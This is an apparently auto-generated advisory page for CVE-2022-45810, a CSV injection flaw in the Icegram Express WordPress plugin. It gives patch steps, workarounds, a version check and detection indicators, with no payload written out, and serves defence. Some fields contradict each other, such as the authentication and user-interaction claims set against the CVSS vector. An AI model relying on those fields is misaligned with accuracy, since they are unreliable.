CVE-2022-45810 – This CVE describes a CSV injection vulnerabilit... (How to Fix)

Q: What is the severity of CVE-2022-45810?

CVE-2022-45810 has a CVSS score of 9.8 (CRITICAL). This CVE describes a CSV injection vulnerability in the Icegram Express WordPress plugin. Attackers can embed malicious formulas in CSV files that, when opened in spreadsheet applications like Excel, execute arbitrary commands. This affects WordPress sites using Icegram Express versions up to 5.5.2.

📋 TL;DR

This CVE describes a CSV injection vulnerability in the Icegram Express WordPress plugin. Attackers can embed malicious formulas in CSV files that, when opened in spreadsheet applications like Excel, execute arbitrary commands. This affects WordPress sites using Icegram Express versions up to 5.5.2.

💻 Affected Systems

Products:

Icegram Express – Email Marketing, Newsletters and Automation for WordPress & WooCommerce

Versions: n/a through 5.5.2

Operating Systems: Any OS running WordPress

Default Config Vulnerable: ⚠️ Yes

Notes: Requires user interaction (opening CSV file in vulnerable spreadsheet application) for exploitation.

📦 What is this software?

Icegram Express by Icegram

View all CVEs affecting Icegram Express →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote code execution on client machines when users open malicious CSV exports in vulnerable spreadsheet applications, potentially leading to full system compromise.

🟠

Likely Case

Data theft, malware installation, or command execution on client systems when users open exported CSV files in spreadsheet software.

🟢

If Mitigated

Limited impact if users open CSV files in text editors or properly configured spreadsheet applications with formula execution disabled.

🌐 Internet-Facing: HIGH

🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires user to download and open CSV file. Attack typically targets client-side spreadsheet applications rather than the server.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 5.5.3 or later

Vendor Advisory: https://patchstack.com/database/vulnerability/email-subscribers/wordpress-icegram-express-email-subscribers-newsletters-and-marketing-automation-plugin-plugin-5-5-2-csv-injection

Restart Required: No

Instructions:

1. Log into WordPress admin panel. 2. Navigate to Plugins → Installed Plugins. 3. Find Icegram Express plugin. 4. Click 'Update Now' if update available. 5. If no update available, download version 5.5.3+ from WordPress repository and manually update.

🔧 Temporary Workarounds

Disable CSV Export

all

Temporarily disable CSV export functionality in plugin settings

Educate Users

all

Train users to open CSV files in text editors or with formula execution disabled in spreadsheet applications

🧯 If You Can't Patch

Disable the Icegram Express plugin entirely until patched
Implement web application firewall rules to block CSV export requests

🔍 How to Verify

Check if Vulnerable:

Check WordPress admin → Plugins → Icegram Express → Version. If version is 5.5.2 or earlier, you are vulnerable.

Check Version:

wp plugin get icegram-express --field=version

Verify Fix Applied:

Verify plugin version is 5.5.3 or later in WordPress admin panel.

📡 Detection & Monitoring

Log Indicators:

Unusual CSV export requests
Multiple failed CSV export attempts

Network Indicators:

CSV file downloads containing formula characters (=, +, -, @) at beginning of cells

SIEM Query:

source="wordpress.log" AND "csv" AND "export" AND ("icegram" OR "email-subscribers")

📊 Metadata

CVE ID: CVE-2022-45810

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-1236

Published: November 7, 2023

Last Updated: February 19, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2022-45810, you might also want to check these: